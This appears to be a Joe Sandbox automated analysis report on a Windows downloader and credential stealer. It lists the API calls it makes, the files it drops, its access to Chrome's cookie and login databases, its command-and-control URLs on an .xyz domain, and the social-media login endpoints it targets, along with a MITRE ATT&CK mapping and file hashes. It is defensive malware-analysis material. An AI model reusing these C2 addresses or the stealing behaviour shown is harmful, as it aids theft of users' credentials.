Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: GetLocaleInfoA,

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Code function: 6_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibClr.dll VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8F4FB1 GetSystemTimeAsFileTime,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8F7DBD _free,GetTimeZoneInformation,_free,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A94C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Native API1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery12	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter2	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture21	Peripheral Device Discovery11	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Create Account1	Access Token Manipulation1	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture21	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Bootkit1	Process Injection12	Install Root Certificate2	NTDS	System Information Discovery58	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing13	LSA Secrets	Query Registry2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Security Software Discovery371	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Virtualization/Sandbox Evasion14	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading2	Proc Filesystem	Process Discovery4	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion14	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection12	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Bootkit1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
h1GodtbhC8.exe	28%	Virustotal		Browse
h1GodtbhC8.exe	19%	Metadefender		Browse
h1GodtbhC8.exe	64%	ReversingLabs	Win32.Downloader.Upatre
h1GodtbhC8.exe	100%	Avira	HEUR/AGEN.1139239
h1GodtbhC8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\71eza90awf48\aliens.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	100%	Joe Sandbox ML
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.h1GodtbhC8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139321	Download File
15.2.1E1C360C582DF797.exe.4370000.4.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
6.2.aliens.exe.4450000.4.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
0.2.h1GodtbhC8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139321	Download File

Domains

Source	Detection	Scanner	Label	Link
ef6df4af06ba6896.xyz	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.	0%	Avira URL Cloud	safe
http://EF6DF4AF06BA6896.xyz/hy	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://EF6DF4AF06BA6896.xyz/F	0%	Avira URL Cloud	safe
http://EF6DF4AF06BA6896.xyz:80/info/wBCj	0%	Avira URL Cloud	safe
http://ef6df4af06ba6896.xyz/info/w	0%	Avira URL Cloud	safe
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://EF6DF4AF06BA6896.xyz/NFh8	0%	Avira URL Cloud	safe
https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
https://www.instagram.comsec-fetch-mode:	0%	Avira URL Cloud	safe
https://twitter.comReferer:	0%	Avira URL Cloud	safe
http://EF6DF4AF06BA6896.xyz/Ahy	0%	Avira URL Cloud	safe
http://www.interestvideo.com/video1.php	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://ef6df4af06ba6896.xyz/	0%	Avira URL Cloud	safe
http://EF6DF4AF06BA6896.xyz:80/info/g	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ef6df4af06ba6896.xyz/nf	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://EF6DF4AF06BA6896.xyz:80/info/eCPI	0%	Avira URL Cloud	safe
http://ef6df4af06ba6896.xyz/info/g	0%	Avira URL Cloud	safe
http://ef6df4af06ba6896.xyz/info/e	0%	Avira URL Cloud	safe
http://ef6df4af06ba6896.xyz/:	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://ef6df4af06ba6896.xyz/info/gz	0%	Avira URL Cloud	safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ef6df4af06ba6896.xyz	172.67.194.30	true	false	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ef6df4af06ba6896.xyz/info/w	false	Avira URL Cloud: safe	unknown
http://ef6df4af06ba6896.xyz/info/e	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://EF6DF4AF06BA6896.xyz/hy	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.messenger.com/	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://EF6DF4AF06BA6896.xyz/F	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://EF6DF4AF06BA6896.xyz:80/info/wBCj	1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	1607153318099.exe, 00000013.00000002.995045101.0000000000198000.00000004.00000010.sdmp	false		high
http://EF6DF4AF06BA6896.xyz/info/w	1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	false		unknown
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_	h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error...	aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://twitter.com/ookie:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://EF6DF4AF06BA6896.xyz/NFh8	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.haxx.se/docs/http-cookies.html	1E1C360C582DF797.exe, 0000000F.00000002.1014478867.0000000005270000.00000004.00000001.sdmp	false		high
https://twitter.comsec-fetch-dest:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.comsec-fetch-mode:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accounts/login/ajax/facebook/	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://www.instagram.com/sec-fetch-site:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://EF6DF4AF06BA6896.xyz/f	1E1C360C582DF797.exe, 0000000F.00000002.1009537921.0000000004287000.00000004.00000040.sdmp	false		unknown
https://twitter.comReferer:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://EF6DF4AF06BA6896.xyz/Ahy	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.interestvideo.com/video1.php	1E1C360C582DF797.exe, 0000000F.00000002.1014478867.0000000005270000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0D	h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ef6df4af06ba6896.xyz/	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://www.instagram.com/accept:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://www.messenger.com/login/nonce/	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	1607153318099.exe	false		high
http://EF6DF4AF06BA6896.xyz:80/info/g	1E1C360C582DF797.exe, 0000000F.00000002.1009251772.0000000002796000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0	h1GodtbhC8.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://twitter.com/compose/tweetsec-fetch-dest:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://www.messenger.com/origin:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://ef6df4af06ba6896.xyz/nf	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	h1GodtbhC8.exe	false		high
https://twitter.com/	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://api.twitter.com/1.1/statuses/update.json	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://upload.twitter.com/i/media/upload.json	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://twitter.com/compose/tweetsec-fetch-mode:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://EF6DF4AF06BA6896.xyz:80/info/eCPI	1E1C360C582DF797.exe, 0000000F.00000003.1003241141.00000000027C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ef6df4af06ba6896.xyz/info/g	1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	aliens.exe, aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr	false		high
http://EF6DF4AF06BA6896.xyz/info/g	1E1C360C582DF797.exe, 0000000F.00000002.1009113059.000000000277A000.00000004.00000020.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1009139131.0000000002781000.00000004.00000020.sdmp	false		unknown
http://ef6df4af06ba6896.xyz/:	1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	h1GodtbhC8.exe, 00000000.00000002.794457688.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.messenger.com/accept:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
http://EF6DF4AF06BA6896.xyz/	1E1C360C582DF797.exe, 0000000F.00000002.1009199504.000000000278C000.00000004.00000020.sdmp	false		unknown
http://ef6df4af06ba6896.xyz/info/gz	1E1C360C582DF797.exe, 0000000F.00000002.1009023272.0000000002748000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false		high
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.28.5.129	unknown	United States		13335	CLOUDFLARENETUS	false
172.67.194.30	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	327203
Start date:	05.12.2020
Start time:	08:25:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 47s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	h1GodtbhC8.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal87.bank.spyw.evad.winEXE@13/17@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 47.8% (good quality ratio 45.8%) Quality average: 79.6% Quality standard deviation: 26.8%
HCA Information:	Successful, ratio: 51% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 51.11.168.160, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 51.104.139.180 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:27:34	API Interceptor	2x Sleep call for process: aliens.exe modified
08:28:37	API Interceptor	1x Sleep call for process: 1E1C360C582DF797.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	OncoImmune.xlsx	Get hash	malicious	Browse	104.16.19.94
	SecuriteInfo.com.Trojan.DownLoader36.26314.8898.exe	Get hash	malicious	Browse	162.159.138.232
	SecuriteInfo.com.Trojan.InjectNET.14.12461.exe	Get hash	malicious	Browse	172.67.188.154
	https://healtymed.com/ADOBE.html	Get hash	malicious	Browse	104.18.44.229
	SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exe	Get hash	malicious	Browse	104.31.85.117
	http://test.kunmiskincare.com/index.php	Get hash	malicious	Browse	104.18.22.230
	Stolen_Images_Evidence.js	Get hash	malicious	Browse	104.18.43.92
	https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.php	Get hash	malicious	Browse	172.67.13.182
	dor001.exe	Get hash	malicious	Browse	23.227.38.74
	SHIPPING.EXE	Get hash	malicious	Browse	172.67.160.246
	SKY POUNDS.exe	Get hash	malicious	Browse	104.24.127.89
	https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.html	Get hash	malicious	Browse	104.26.7.139
	Documento de transferencia de Scotiabank7497574730084doc.exe	Get hash	malicious	Browse	172.67.143.180
	Document N0-BR1702Q667420_12.exe	Get hash	malicious	Browse	172.67.143.180
	proforma invoice5087713.xls	Get hash	malicious	Browse	104.28.4.151
	mCiZXEeKax.exe	Get hash	malicious	Browse	104.18.53.69
	OKx5tyuiLx.exe	Get hash	malicious	Browse	104.26.2.232
	RFQ.xls	Get hash	malicious	Browse	162.159.135.232
	https://maxhealth-conm.cf/?login=do	Get hash	malicious	Browse	104.16.19.94
	K4THUpcxOE.exe	Get hash	malicious	Browse	104.31.82.101
CLOUDFLARENETUS	OncoImmune.xlsx	Get hash	malicious	Browse	104.16.19.94
	SecuriteInfo.com.Trojan.DownLoader36.26314.8898.exe	Get hash	malicious	Browse	162.159.138.232
	SecuriteInfo.com.Trojan.InjectNET.14.12461.exe	Get hash	malicious	Browse	172.67.188.154
	https://healtymed.com/ADOBE.html	Get hash	malicious	Browse	104.18.44.229
	SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exe	Get hash	malicious	Browse	104.31.85.117
	http://test.kunmiskincare.com/index.php	Get hash	malicious	Browse	104.18.22.230
	Stolen_Images_Evidence.js	Get hash	malicious	Browse	104.18.43.92
	https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.php	Get hash	malicious	Browse	172.67.13.182
	dor001.exe	Get hash	malicious	Browse	23.227.38.74
	SHIPPING.EXE	Get hash	malicious	Browse	172.67.160.246
	SKY POUNDS.exe	Get hash	malicious	Browse	104.24.127.89
	https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.html	Get hash	malicious	Browse	104.26.7.139
	Documento de transferencia de Scotiabank7497574730084doc.exe	Get hash	malicious	Browse	172.67.143.180
	Document N0-BR1702Q667420_12.exe	Get hash	malicious	Browse	172.67.143.180
	proforma invoice5087713.xls	Get hash	malicious	Browse	104.28.4.151
	mCiZXEeKax.exe	Get hash	malicious	Browse	104.18.53.69
	OKx5tyuiLx.exe	Get hash	malicious	Browse	104.26.2.232
	RFQ.xls	Get hash	malicious	Browse	162.159.135.232
	https://maxhealth-conm.cf/?login=do	Get hash	malicious	Browse	104.16.19.94
	K4THUpcxOE.exe	Get hash	malicious	Browse	104.31.82.101

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibClr.dll	KeJ7Cl7flZ.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsh2646.tmp\Sibuia.dll	KeJ7Cl7flZ.exe	Get hash	malicious	Browse
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll	KeJ7Cl7flZ.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\71eza90awf48\aliens.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	506545472
Entropy (8bit):	0.13665136586177498
Encrypted:	false
SSDEEP:
MD5:	87698F069716708B6743A580B1D0D0CC
SHA1:	6E8585C0596C41CEAF1EEA7E8AEEFF3393A4F126
SHA-256:	6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
SHA-512:	B92564EB4995FD6637F8EAECD6AAC285C8527DECEDF21D423491F98040962ABACFA4F27977E43DA7ED8DCF4B190156DA5EFAF146E2DD76FB0E51D77476F65D3E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibCa.dll Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	6.867501832742936
Encrypted:	false
